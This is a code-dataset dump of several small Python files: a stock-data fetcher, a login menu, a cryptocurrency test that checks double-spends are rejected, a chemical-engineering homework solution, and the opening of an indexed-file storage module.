Dataset schema (one row per source file):

| column | type | range / classes |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 2–616 |
| content_id | string | length 40 |
| detected_licenses | list | length 0–69 |
| license_type | string | 2 classes |
| repo_name | string | length 5–118 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | length 4–63 |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 2.91k to 686M (nullable) |
| star_events_count | int64 | 0–209k |
| fork_events_count | int64 | 0–110k |
| gha_license_id | string | 23 classes |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 213 classes |
| src_encoding | string | 30 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 2–10.3M |
| extension | string | 246 classes |
| content | string | length 2–10.3M |
| authors | list | length 1 |
| author_id | string | length 0–212 |
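A minimal sketch of filtering rows with this schema using pandas; the Parquet filename is an assumption for illustration, and only columns from the table above are used:

```python
import pandas as pd

# Load the dataset rows (the filename is a placeholder, not part of the dataset).
df = pd.read_parquet("code_dataset.parquet")

# Keep hand-written, permissively licensed Python files, using the schema above.
mask = (~df["is_vendor"]) & (~df["is_generated"]) & (df["license_type"] == "permissive")
for _, row in df[mask].iterrows():
    print(row["repo_name"], row["path"], row["length_bytes"])
```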
---
### afcarl/stock-analysis · /get_data_quandl.py

- blob_id: 794a7d84ec90f65b1511ebed775cf8e106c133ea | directory_id: f81770e50efa6591b949e8124c26bd25cdcac8b8 | content_id: da25dc4e29cb1c1ecf0313fe255d63833d63bdf5
- detected_licenses: [] | license_type: no_license
- snapshot_id: 62fe629c14a1230972611e728a5bf0f6edff57d7 | revision_id: 5bde6093437fd2152e876d4d686045c52f5a5307 | branch_name: refs/heads/master
- visit_date: 2020-09-03T23:33:50.542928 | revision_date: 2018-03-20T15:12:12 | committer_date: 2018-03-20T15:12:12
- github_id: null | star_events_count: 0 | fork_events_count: 0
- gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
- src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 338 | extension: py

content:

```python
import quandl

# Put your API key in auth.txt to run the script.
with open('auth.txt', 'r') as f:
    auth_tok = f.read().splitlines()[0]
quandl.ApiConfig.api_key = auth_tok

data = quandl.get("WIKI/KO", start_date="2000-12-12", end_date="2014-12-30")
print(data['Adj. Close'])
```

authors: ["alex20041051@gmail.com"]
author_id: alex20041051@gmail.com
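A small follow-on sketch that persists the series fetched by the script above; the output filename is illustrative and not part of the original script:

```python
# Assuming `data` from the script above: save the adjusted close for later reuse.
adj_close = data['Adj. Close']
adj_close.to_csv('KO_adj_close.csv', header=True)  # filename is an assumption

# Quick sanity check: first rows and the overall date span.
print(adj_close.head())
print(adj_close.index.min(), "to", adj_close.index.max())
```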
---
### bthecs/Python · /20-proyecto-python/main.py

- blob_id: 7570f5e15fedff0e24028361292b3cc3a8d6cb57 | directory_id: 50c668e9e0c10c1bcfd093b824e58ab66867cf30 | content_id: c57bc118d609483598ce8ca1735fe924b4313728
- detected_licenses: [] | license_type: no_license
- snapshot_id: 1d4e9f424fce633c2fe50455654b21a1e56b3a19 | revision_id: b587f67bc6f999de4e80ebb53982430e48a68242 | branch_name: refs/heads/master
- visit_date: 2023-03-29T00:40:36.071294 | revision_date: 2021-03-30T00:31:34 | committer_date: 2021-03-30T00:31:34
- github_id: 352,788,286 | star_events_count: 1 | fork_events_count: 0
- gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
- src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 430 | extension: py

content:

```python
"""
Proyecto Python y Mysql:
-Abrir asistente
-Login o registros
-Si elegimo login, identifica al usuario y nos preguntara
-Crear nota, mostrar notas, borrarlas
"""
from usuarios import acciones
print("""
Acciones disponibles:
-registro
-login
""")
hazEl = acciones.Acciones()
accion = input("Que deseas hacer?: ")
if accion == 'registro':
hazEl.registro()
elif accion == 'login':
hazEl.login()
```

authors: ["fl.gimenez@alumno.um.edu.ar"]
author_id: fl.gimenez@alumno.um.edu.ar
---
### MateuszChmielewski99/CollardRecommendation · /strategies/preprocess/BasePreprocessStrategy.py

- blob_id: 35d0edee077868cf1d8eb1a21a31002342d71494 | directory_id: 83e436d062adf45591b737b804de76d849446130 | content_id: 0dac414bf53b02b80833dc404c0a26239b2a4fbe
- detected_licenses: [] | license_type: no_license
- snapshot_id: 423783a316a8fcea063038f096af3b3ad0e2d1d5 | revision_id: 46ea6cb384976176bd34f625f9806c857ac64bf5 | branch_name: refs/heads/main
- visit_date: 2023-02-17T18:32:15.959255 | revision_date: 2021-01-18T23:21:00 | committer_date: 2021-01-18T23:21:00
- github_id: 330,805,681 | star_events_count: 0 | fork_events_count: 0
- gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
- src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 119 | extension: py

content:

```python
from pandas import DataFrame


class BasePreprocessStrategy:
    def execute(self, dataframe: DataFrame):
        pass
```

authors: ["chmielewski079@gmail.com"]
author_id: chmielewski079@gmail.com
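A minimal sketch of how such a strategy base class might be subclassed; the `DropNaStrategy` name and its behavior are illustrative assumptions, not part of the repository above:

```python
from pandas import DataFrame


class DropNaStrategy(BasePreprocessStrategy):
    """Hypothetical strategy: drop rows with missing values."""

    def execute(self, dataframe: DataFrame):
        # Return a cleaned copy rather than mutating the input.
        return dataframe.dropna().reset_index(drop=True)


# Usage: strategies share the execute() interface, so they are interchangeable.
# df_clean = DropNaStrategy().execute(df_raw)
```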
---
### jakilwq/TerraCredit · /test/functional/zerocoin_valid_public_spend.py

- blob_id: 665b611c5b7f2ceaf32df3bad8123faf25217302 | directory_id: e4cc95ec952cfc183ae3c1122d145497a580f305 | content_id: bcf9e9e73bf72cf3be0158a06b5dec84d726e1a3
- detected_licenses: ["MIT"] | license_type: permissive
- snapshot_id: 80866e19dde3e67efbec7ede705d5046b0973c1f | revision_id: 56c8833c79a2485ae9a4d101f9b7267b867a3cdf | branch_name: refs/heads/master
- visit_date: 2022-12-15T21:58:42.421232 | revision_date: 2020-09-04T06:51:03 | committer_date: 2020-09-04T06:51:03
- github_id: 292,806,732 | star_events_count: 0 | fork_events_count: 0
- gha_license_id: null | gha_event_created_at: 2020-09-04T09:27:12 | gha_created_at: 2020-09-04T09:27:12 | gha_language: null
- src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 8,859 | extension: py

content:

```python
#!/usr/bin/env python3
# Copyright (c) 2019 The TERRACREDIT developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Tests a valid publicCoinSpend spend
'''
from time import sleep
from fake_stake.util import TestNode
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import p2p_port, assert_equal, assert_raises_rpc_error, assert_greater_than_or_equal
class zCREDITValidCoinSpendTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [['-sporkkey=932HEevBSujW2ud7RfB1YF91AFygbBRQj3de3LyaCRqNzKKgWXi']]
def setup_network(self):
self.setup_nodes()
def init_test(self):
title = "*** Starting %s ***" % self.__class__.__name__
underline = "-" * len(title)
self.log.info("\n\n%s\n%s\n%s\n", title, underline, self.description)
# Setup the p2p connections and start up the network thread.
self.test_nodes = []
for i in range(self.num_nodes):
self.test_nodes.append(TestNode())
self.test_nodes[i].peer_connect('127.0.0.1', p2p_port(i))
def generateBlocks(self, n=1):
fStaked = False
while (not fStaked):
try:
self.nodes[0].generate(n)
fStaked = True
except JSONRPCException as e:
if ("Couldn't create new block" in str(e)):
# Sleep 2 seconds and retry
self.log.info("waiting...")
sleep(2)
else:
raise e
def mintZerocoin(self, denom):
self.nodes[0].mintzerocoin(denom)
self.generateBlocks(5)
def setV4SpendEnforcement(self, fEnable=True):
new_val = 1563253447 if fEnable else 4070908800
# update spork 18 and mine 1 more block
mess = "Enabling v4" if fEnable else "Enabling v3"
mess += " PublicSpend version with SPORK 18..."
self.log.info(mess)
res = self.nodes[0].spork("SPORK_18_ZEROCOIN_PUBLICSPEND_V4", new_val)
self.log.info(res)
assert_equal(res, "success")
sleep(1)
def run_test(self):
self.description = "Tests a valid publicCoinSpend spend."
self.init_test()
        INITIAL_MINED_BLOCKS = 301  # Blocks mined before minting
        MORE_MINED_BLOCKS = 26      # Blocks mined after minting (before spending)
        DENOM_TO_USE = 1            # zc denomination used for double-spending attack
        # 1) Start mining blocks
        self.log.info("Mining/Staking %d first blocks..." % INITIAL_MINED_BLOCKS)
        self.generateBlocks(INITIAL_MINED_BLOCKS)
# 2) Mint zerocoins
self.log.info("Minting %d-denom zCREDITs..." % DENOM_TO_USE)
for i in range(5):
self.mintZerocoin(DENOM_TO_USE)
# 3) Mine more blocks and collect the mint
self.log.info("Mining %d more blocks..." % MORE_MINED_BLOCKS)
self.generateBlocks(MORE_MINED_BLOCKS)
        mints = self.nodes[0].listmintedzerocoins(True, True)
        serial_ids = [mint["serial hash"] for mint in mints]
assert_greater_than_or_equal(len(serial_ids), 3)
# 4) Get the raw zerocoin data - save a v3 spend for later
exported_zerocoins = self.nodes[0].exportzerocoins(False)
zc = [x for x in exported_zerocoins if x["id"] in serial_ids]
assert_greater_than_or_equal(len(zc), 3)
saved_mint = zc[2]["id"]
old_spend_v3 = self.nodes[0].createrawzerocoinpublicspend(saved_mint)
# 5) Spend the minted coin (mine six more blocks) - spend v3
serial_0 = zc[0]["s"]
randomness_0 = zc[0]["r"]
privkey_0 = zc[0]["k"]
self.log.info("Spending the minted coin with serial %s and mining six more blocks..." % serial_0)
txid = self.nodes[0].spendzerocoinmints([zc[0]["id"]])['txid']
self.log.info("Spent on tx %s" % txid)
self.generateBlocks(6)
rawTx = self.nodes[0].getrawtransaction(txid, 1)
if rawTx is None:
self.log.warning("rawTx not found for: %s" % txid)
raise AssertionError("TEST FAILED")
else:
assert_equal(rawTx["confirmations"], 6)
self.log.info("%s: VALID PUBLIC COIN SPEND (v3) PASSED" % self.__class__.__name__)
# 6) Check double spends - spend v3
self.log.info("%s: Trying to spend the serial twice now" % self.__class__.__name__)
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[0].spendrawzerocoin, serial_0, randomness_0, DENOM_TO_USE, privkey_0)
self.log.info("GOOD: Double-spending transaction did not verify.")
# 7) Check spend v2 disabled
self.log.info("%s: Trying to spend using the old coin spend method.." % self.__class__.__name__)
try:
res = self.nodes[0].spendzerocoin(DENOM_TO_USE, False, False, "", False)
except JSONRPCException as e:
# JSONRPCException was thrown as expected. Check the code and message values are correct.
if e.error["code"] != -4:
raise AssertionError("Unexpected JSONRPC error code %i" % e.error["code"])
if ("Couldn't generate the accumulator witness" not in e.error['message'])\
and ("The transaction was rejected!" not in e.error['message']):
raise AssertionError("Expected substring not found:" + e.error['message'])
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
self.log.info("GOOD: spendzerocoin old spend did not verify.")
# 8) Activate v4 spends with SPORK_18
self.log.info("Activating V4 spends with SPORK_18...")
self.setV4SpendEnforcement(True)
self.generateBlocks(2)
# 9) Spend the minted coin (mine six more blocks) - spend v4
serial_1 = zc[1]["s"]
randomness_1 = zc[1]["r"]
privkey_1 = zc[1]["k"]
self.log.info("Spending the minted coin with serial %s and mining six more blocks..." % serial_1)
txid = self.nodes[0].spendzerocoinmints([zc[1]["id"]])['txid']
self.log.info("Spent on tx %s" % txid)
self.generateBlocks(6)
rawTx = self.nodes[0].getrawtransaction(txid, 1)
if rawTx is None:
self.log.warning("rawTx not found for: %s" % txid)
raise AssertionError("TEST FAILED")
else:
assert_equal(rawTx["confirmations"], 6)
self.log.info("%s: VALID PUBLIC COIN SPEND (v4) PASSED" % self.__class__.__name__)
# 10) Check double spends - spend v4
self.log.info("%s: Trying to spend the serial twice now" % self.__class__.__name__)
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[0].spendrawzerocoin, serial_1, randomness_1, DENOM_TO_USE, privkey_1)
self.log.info("GOOD: Double-spending transaction did not verify.")
# 11) Try to relay old v3 spend now
self.log.info("%s: Trying to send old v3 spend now" % self.__class__.__name__)
assert_raises_rpc_error(-26, "bad-txns-invalid-zcredit",
self.nodes[0].sendrawtransaction, old_spend_v3)
self.log.info("GOOD: Old transaction not sent.")
# 12) Try to double spend with v4 a mint already spent with v3
self.log.info("%s: Trying to double spend v4 against v3" % self.__class__.__name__)
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[0].spendrawzerocoin, serial_0, randomness_0, DENOM_TO_USE, privkey_0)
self.log.info("GOOD: Double-spending transaction did not verify.")
# 13) Reactivate v3 spends and try to spend the old saved one
self.log.info("Activating V3 spends with SPORK_18...")
self.setV4SpendEnforcement(False)
self.generateBlocks(2)
self.log.info("%s: Trying to send old v3 spend now" % self.__class__.__name__)
txid = self.nodes[0].sendrawtransaction(old_spend_v3)
self.log.info("Spent on tx %s" % txid)
self.generateBlocks(6)
rawTx = self.nodes[0].getrawtransaction(txid, 1)
if rawTx is None:
self.log.warning("rawTx not found for: %s" % txid)
raise AssertionError("TEST FAILED")
else:
assert_equal(rawTx["confirmations"], 6)
self.log.info("%s: VALID PUBLIC COIN SPEND (v3) PASSED" % self.__class__.__name__)
if __name__ == '__main__':
zCREDITValidCoinSpendTest().main()
```

authors: ["alonewolf2ksk@gmail.com"]
author_id: alonewolf2ksk@gmail.com
---
### ohnari/py · /on/z.py

- blob_id: 89d1c1b7edc57086880534bce223e185945de49f | directory_id: 1a2963e19984c6c4f542ef91113516d589cb964e | content_id: 8f6cebc3c8bbf858bf6c89fffe79bd61e7216956
- detected_licenses: [] | license_type: no_license
- snapshot_id: a33fe98cd65e55d4da80442c3501b72610ba863b | revision_id: 7c96d7cbfc8de8fd398237c8dda10d6ac66f7b53 | branch_name: refs/heads/master
- visit_date: 2020-04-19T16:09:36.387718 | revision_date: 2019-02-13T09:02:38 | committer_date: 2019-02-13T09:02:38
- github_id: 168,295,681 | star_events_count: 0 | fork_events_count: 0
- gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
- src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 282 | extension: py

content:

```python
#from pack import NariPairs
#from pack import ForexDataClient
#from pack import GaitameDataClient
#from pack import NariPairs
import pack
p = pack.NariPairs.getSymbolList(['eu'])
a = pack.GaitameDataClient()
b = pack.ForexDataClient()
c = a.getQuotes(p)
print(c)
print(b.base_uri)
```

authors: ["unconfigured@null.spigotmc.org"]
author_id: unconfigured@null.spigotmc.org
---
### maryam-azhin/ChE445-Winter2020 · /HW_7/ChE445_HW7_Winter2020_Solution.py

- blob_id: 7525be1bcf6253a89b93a1686c8b64641ea89d39 | directory_id: a43763ea407ceab8588a661885e9744f3c8a8262 | content_id: 7f381feb0973ad20f753d6893b0c32d6f4471a27
- detected_licenses: [] | license_type: no_license
- snapshot_id: 30cbecc7b568f6274253e118257099c5b0963a31 | revision_id: 1e90e7854f1a07b62a962404f7c3fe1d19dde4d3 | branch_name: refs/heads/master
- visit_date: 2021-07-21T20:17:12.840870 | revision_date: 2021-01-06T08:50:28 | committer_date: 2021-01-06T08:50:28
- github_id: 233,687,358 | star_events_count: 1 | fork_events_count: 0
- gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
- src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 8,774 | extension: py

content:

```python
#!/usr/bin/env python
# coding: utf-8
# ##### T.A. Maryam Azhin,
#
# Department of Chemical and Materials Engineering, University of Alberta
# **HW7. External mass transfer limitations.**
#
# due Monday, March 30, 2020. Weight: 2%
# Reaction: $A + O_2 \rightarrow B$ (gas phase)
#
# Kinetics: Intrinsically $1^{st}$ order to $A$ and apparent $0^{th}$ order to $O_2$ (excess air and $O_2$)*
#
# Catalyst: Spherical, $3\; cm$ diameter, non-porous, $4\; kg$
#
# Reactor: tubular PBR, i.d. $0.05\; m$, no pressure drop
#
# Bed density and porosity: $500 kg/m^3$, $0.4$
#
# Other properties at reaction temperature:
# -Concentration of $A$ in the entering feed $5E-4 mol/m^3$
#
# -Diffusivity of $A$ in air $2E-5 m^2/s$
#
# -Kinematic viscosity of the fluid $5E-5\; m^2/s$
#
# -Intrinsic rate constant $8\; m^3(fluid)/(m^3(bed)\; s)$
#
# External temperature gradients are negligible at all conditions in this assignment, but there is the possibility of external MTL and we have to find conditions to maximize the production of B. The system can be assumed to be constant density because of the excess oxygen (air).
#
# **Question 1.** For volumetric flow rates (reaction conditions) of $0.0005$, $0.05$ and $15\; m^3/s$, express the surface concentration of $A$ as a function of its bulk concentration. (hint: use $k$ and $k_c$). 35 pts
#
# **Question 2.** Among the three cases, select the flow rate where external MTL can be ignored and calculate $X_A$ and exit molar flow rate of product $B$ (use ideal PBR design equation, and use bed density to have the correct units for the rate constant to be used in the mole balance for the PBR). 10 pts
#
# **Question 3.** Among these three cases, select the flow rate where external MTL is severe and external diffusion is rate-limiting. Again, calculate $X_A$ and $F_B$ considering that the observed rate is equal to the mass transfer rate. (For bed length, use bed density, catalyst mass and the tube Ac). 15 pts
#
# **Question 4.** Calculate the conversion and $F_B$ for the third case. (Use the PBR design equation with $C_{As}$, but conversion is related to $C_{Ab}$, not $C_{As}$. Again, watch out for units of $k$ as in **Q2**). 25 pts
#
# **Question 5.** Can you explain why the conversion in the cases affected by external MTL is higher than in the case where kinetics are rate determining? If your target were to produce the highest exit $F_B$, which
# case among the three would you prefer? 10 pts
#
# **Question 6.** Given that diffusivities in liquid phase are lower than those in gas phase, which reactions are more prone to mass-transfer limitations: those in gas phase or in liquid phase? 5 pts
#
# *Note: an “apparent” order means that the reaction rate at these particular concentrations (pressures) and temperature does not depend on the oxygen pressure. The reaction may still be, for example, an intrinsic
# first order to oxygen:
#
# \begin{eqnarray}
# -r_A = k \cdot C_A \cdot P_{O_2}
# \end{eqnarray}
#
# But because of the excess oxygen, its partial pressure does not change significantly during the reaction, so it can be lumped into the rate constant (e.g. if there are $100$ times more moles of $O_2$ than of $A$, the pressure of oxygen will drop negligibly even when all $A$ is consumed). So, the rate law (only at these particular conditions) can be simplified to $-r_A = k^* \cdot C_A$.
# **Answer to Q1**
# \begin{eqnarray}
# C_{As}=\frac{k_ca_c}{k+k_ca_c}C_{Ab}, \;\;\;1^{st}\;order
# \end{eqnarray}
#
# \begin{eqnarray}
# k_{c}=\frac{D_{AB}*Sh}{D_p}\\
# Sh=2+0.6*Re_p^{0.5}*Sc^{1/3}\\
# Sc=\frac{\nu}{D_{AB}}=\frac{5*10^{-5}}{2*10^{-5}}=2.5
# \end{eqnarray}
#
# \begin{eqnarray}
# Re_p=\frac{u*D_p}{\nu}=\frac{Q*D_p}{A_c*\nu}=Q*\frac{0.03}{\pi*0.025^2*5*10^{-5}}=305578*Q
# \end{eqnarray}
#
# \begin{eqnarray}
# a_c=\frac{6*(1-\phi)}{D_p}=120 \frac{m^2}{m^3_{bed}}
# \end{eqnarray}
#
# Check units:
#
# $[k]=[\frac{m^3_{l}}{m^3_{bed}*s}]$
#
# $[k_ca_c]=[\frac{m}{s}*\frac{m^2}{m^3_{bed}}]$, match, ok.
#
# |$Q,\;m^3/s$|$Sc$|$Re_p$|$Sh$|$k_c,\;m/s$|$C_{As}=\frac{k_c*a_c}{k+k_c*a_c}*C_{Ab}$|
# |:---------:|-----:|-----:|-----:|----------:|---------------------------------------:|
# |0.0005 |2.5|153 |12.068|$8.04*10^{-3}$ |$C_{As}=0.11*C_{Ab}\;\;\frac{mol}{m^3}$ |
# |0.05 |2.5|15279 |102.68|$6.84*10^{-2}$|$C_{As}=0.51*C_{Ab}\;\;\frac{mol}{m^3}$|
# |15|2.5|4583798|1745.87|1.16|$C_{As}=0.95*C_{Ab}\;\;\frac{mol}{m^3}$|
# In[1]:
import numpy as np
nu=5*pow(10,-5) #m2/s
DAB=2*pow(10,-5) #m2/s
Sc=nu/DAB
Dp=0.03 #m
CA0=5*pow(10,-4) #mol/m3
rhob=500 #kg/m3
phi=0.4
k=8 #m3fl/(m3cat.s)
W=4
Id=0.05 #m
Ac=3.14*pow(Id,2)/4
ac=6*(1-phi)/Dp #1/m
print ("Sc=",Sc)
Q=[0.0005,0.05,15]
Rep=np.zeros(len(Q))
Sh=np.zeros(len(Q))
kc=np.zeros(len(Q))
CAs_coef=np.zeros(len(Q))
for i in range(0,len(Q)):
Rep[i]=Q[i]*Dp/(nu*Ac)
Sh[i]=2+0.6*pow(Rep[i],1/2)*pow(Sc,1/3)
kc[i]=Sh[i]*DAB/Dp
CAs_coef[i]=kc[i]*ac/(k+kc[i]*ac)
print ("ac=",ac)
print ("Q=",Q)
print ("Rep=",Rep)
print ("Sh=",Sh)
print ("kc=",kc)
print ("CAs=",CAs_coef,'*CAb')
# ----
# **Answer to Q2**
#
# When $C_{As} \approx C_{Ab}$, there are no external MTL; this is the case at $Q=15\;\frac{m^3}{s}$
#
# **MB PBR:**
#
# \begin{eqnarray}
# F_{A0}\frac{dX}{dW}=kC_A=k\frac{F_{A0}}{Q}(1-X)
# \end{eqnarray}
# constant $Q$:
#
# \begin{eqnarray}
# \frac{dX}{1-X}=\frac{k}{Q}dW\\
# ln(\frac{1}{1-X})=\frac{k*W}{Q}
# \end{eqnarray}
#
# units: from MB: $[\frac{mol}{s*kg_{cat}}]=[k*\frac{mol}{m^3_{fl}}]$
#
# $[k]=[\frac{m^3_{fl}}{s*kg_{cat}}]$
#
# $k$ is given as $8\;\;\frac{m^3_{fl}}{m^3_{bed}*s}$ so multiply by $\frac{1}{\rho_b[kg_{cat}/m^3_{bed}]}$
#
# \begin{eqnarray}
# X=1-exp(\frac{-k*W}{\rho_b*Q})=1-exp(\frac{-8*4}{500*15})=0.4\;\%
# \end{eqnarray}
#
# \begin{eqnarray}
# F_B=F_{A0}*X_A=C_{A0}*Q*X=5*10^{-4}*15*\frac{0.4}{100}=3*10^{-5}\;\;\frac{mol}{s}
# \end{eqnarray}
# In[2]:
import math
X3=1-math.exp((-k*W)/(rhob*Q[2]))
FB3=CA0*Q[2]*X3
print("X3={0:.4f}".format(X3),'%')
print ("FB3={0:.6f}".format(FB3),'mol/s')
# -----
# **Answer to Q3**
#
# When $C_{As}=0$ ($<<C_{Ab}$) then there are severe external MTL. This is the case with $0.0005\frac{m^3}{s}$.
#
# At constant $Q$
#
# \begin{eqnarray}
# ln(\frac{1}{1-X})=\frac{k_ca_cL}{u}\\
# \frac{L}{u}=\frac{V_{bed}/A_c}{Q/A_c}=\frac{W/\rho_{bed}}{Q}\\
# ln(\frac{1}{1-X})=-8.04*10^{-3}*120*\frac{4/500}{0.0005}\\
# X=100\%
# \end{eqnarray}
#
# \begin{eqnarray}
# F_B=F_{A0}*X_A=C_{A0}*Q*X=5*10^{-4}*0.0005*1=2.5*10^{-7}\;\frac{mol}{s}
# \end{eqnarray}
# In[3]:
X1=1-math.exp(-kc[0]*ac*W/(rhob*Q[0]))
FB1=CA0*Q[0]*X1
print("X1={0:.2f}".format(X1),'%')
print ("FB1={0:.8f}".format(FB1),'mol/s')
# ----
# **Answer to Q4**
#
# \begin{eqnarray}
# F_{A0}\frac{dX}{dW}=kC_{As}
# \end{eqnarray}
# for $Q=0.05\;m^3/s$:
#
# \begin{eqnarray}
# C_{As}=C_{Ab}\frac{k_ca_c}{k+k_ca_c}=0.51 C_{Ab}\\
# C_{Ab}=\frac{F_{A0}}{Q}(1-X)
# \end{eqnarray}
# at $Q$ constant:
#
# \begin{eqnarray}
# ln(\frac{1}{1-X})=\frac{k*W*0.51}{Q}
# \end{eqnarray}
#
# Here, $k$ has units $\frac{m^3_{fl}}{s*kg_{cat}}$
#
# given $k=8 \frac{m^3_{fl}}{m^3_{bed}*s}*\frac{1[m^3_{bed}]}{500[kg_{cat}]}$
#
# \begin{eqnarray}
# ln(\frac{1}{1-X})=\frac{8*4*0.51}{0.05*500}\\
# X=48\%
# \end{eqnarray}
#
# $F_{B}=F_{A0}X=C_{A0}QX=5*10^{-4}*0.05*0.48=1.2*10^{-5} \frac{mol}{s}$
#
# In[4]:
X2=1-math.exp(-k*W*CAs_coef[1]/(rhob*Q[1]))
FB2=CA0*Q[1]*X2
print("X2={0:.3f}".format(X2),'%')
print ("FB2={0:.7f}".format(FB2),'mol/s')
# ----
# **Answer to Q5**
#
# **In the cases affected by MTL**
#
# External MTL is present when $Q$, and hence $F_{A0}$, is low: the fluid spends more time in the reactor, so a higher conversion $X$ is achieved. With $k_ca_c \ll k$, diffusion is slow and the reaction fast, so the observed reaction rate equals the rate of external diffusion.
#
# **At high $Q$,** when there are no MTL, even at low $X$, $F_B$ is the highest.
#
# $Q=15\; m^3/s$ gives the highest $F_B$; $Q=0.05\; m^3/s$ gives a slightly smaller $F_B$ while reaching a much larger conversion, $X=48\%$. So the case $Q=0.05\; m^3/s$ is the best compromise: a high exit $F_B$ together with a high conversion.
# ----
# **Answer to Q6**
#
# Diffusivities in the liquid phase are lower (because liquids are denser), so liquid-phase reactions are more prone to MTL: a lower diffusivity means a lower mass transfer coefficient and hence stronger external MTL.
#
# $k_c \propto D_{AB}$, therefore a smaller $D_{AB}$ results in a smaller mass transfer coefficient $k_c$. The smaller the mass transfer coefficient, the more prone the reaction is to mass transfer limitations. Since liquids have low diffusion rates, they suffer stronger MTL.
```

authors: ["azhin@ualberta.ca"]
author_id: azhin@ualberta.ca
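A compact cross-check of Q2–Q4, reusing the quantities defined in the solution above; it applies the series-resistance form $k_{eff} = k \cdot \frac{k_c a_c}{k + k_c a_c}$ in the PBR design equation for all three flow rates (this unifying shortcut is an editorial sketch, not part of the original solution):

```python
import numpy as np

# Values taken from the solution above.
nu, DAB, Dp, CA0, rhob, phi, k, W, Id = 5e-5, 2e-5, 0.03, 5e-4, 500, 0.4, 8, 4, 0.05
Ac = 3.14 * Id**2 / 4          # tube cross-sectional area, m^2
ac = 6 * (1 - phi) / Dp        # external area per bed volume, 1/m
Sc = nu / DAB

for Q in (0.0005, 0.05, 15):
    Rep = Q * Dp / (nu * Ac)
    kc = (2 + 0.6 * Rep**0.5 * Sc**(1 / 3)) * DAB / Dp   # Froessling correlation
    frac = kc * ac / (k + kc * ac)                       # C_As / C_Ab from Q1
    X = 1 - np.exp(-k * frac * W / (rhob * Q))           # PBR mole balance
    print(f"Q={Q}: X={100 * X:.2f}%  FB={CA0 * Q * X:.2e} mol/s")
```

The three printed conversions reproduce the 100%, 48% and 0.4% answers of Q3, Q4 and Q2 respectively, since the effective constant reduces to $k_ca_c$ when $k_ca_c \ll k$ and to $k$ when $k_ca_c \gg k$.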
---
### destrangis/indexed · /indexed.py

- blob_id: a5c90c37e4a5591bf12c0421d468c67aff000f88 | directory_id: 464208517e4691fd9e9dd56a46550e35ae34555f | content_id: 962de385c0f62ddcac53c2de0d212e96279e0f87
- detected_licenses: ["MIT"] | license_type: permissive
- snapshot_id: 260cea22afb94888cbb0282dbc6b007c2a0ed5da | revision_id: 38dbca8719dfdcbb5d9c4e64192077f4aafd87da | branch_name: refs/heads/master
- visit_date: 2020-08-10T06:35:52.809507 | revision_date: 2019-10-10T21:03:53 | committer_date: 2019-10-10T21:03:53
- github_id: 214,284,068 | star_events_count: 0 | fork_events_count: 0
- gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
- src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 10,519 | extension: py

content:

```python
import sys
import struct
import pathlib
import pickle
from numbers import Number
VERSION = "1.0.0"
INTSIZE = 4
INTBINFORMAT = "!L"
HEADERFORMAT = "!LLLL"
MAGIC_NUMBER = 0xd8fd2372
NO_MORE_RECORDS = 0xffffffff
DEFAULT_RECORD_SIZE = 512
DEFAULT_NUM_RECORDS = 10
RECORDS_OFFSET = 4 * INTSIZE # start of records area
class IndexedFileError(Exception):
pass
class IndexedFile:
"""
Simple indexed files.
Format:
Byte: 0<-- INTSIZE-> <-INTSIZE-> <-- INTSIZE -> <-- INTSIZE ---->
Header +-------------+-----------+--------------+-----------------+
| Magic | Rec. Size | Index offset | 1st free record |
Records +-------------+-----------+--------------+-----------------+
+--- | next record | Record (recsize - INTSIZE bytes) |
| +-------------+ |
| | |
+--> +-------------+--------------------------------------------+
+--- | next record | Record |
| +-------------+
+--> ...... INTSIZE INTSIZE
+-------------+--------------------------+---------+-------+
Index | Key Length | Key (Key Lenght bytes) | Rec.Idx | Size |
+-------------+--------------------------+---------+-------+
| Key Length | Key | Rec.Idx | Size |
+-------------+--------------------------+---------+-------+
......
+-------------+
End | 0x00000000 |
+-------------+
"""
def __init__(self, name, mode='r',
recordsize=DEFAULT_RECORD_SIZE,
num_recs_hint=DEFAULT_NUM_RECORDS):
if mode not in "rc":
raise IndexedFileError("'{}' Mode must be 'r' or 'c'")
self.name = name
self.path = pathlib.Path(name)
self.index = {}
if mode == "r":
if self.path.is_file():
self.open()
else:
raise IndexedFileError("'{}' Not found.")
elif mode == "c":
self.recordsize = max(recordsize, 2 * INTSIZE)
self.current_size = num_recs_hint*recordsize
self.index_offset = self.current_size + RECORDS_OFFSET
self.first_free = 0
self.create()
def _read_header(self):
self.fd.seek(0)
buf = self.fd.read(4*INTSIZE)
magic, rs, idxoffs, fstfree = struct.unpack(HEADERFORMAT, buf)
if magic != MAGIC_NUMBER:
raise IndexedFileError("'{}' Bad magic number."
.format(self.name))
self.recordsize = rs
self.index_offset = idxoffs
self.first_free = fstfree
self.current_size = self.index_offset - RECORDS_OFFSET
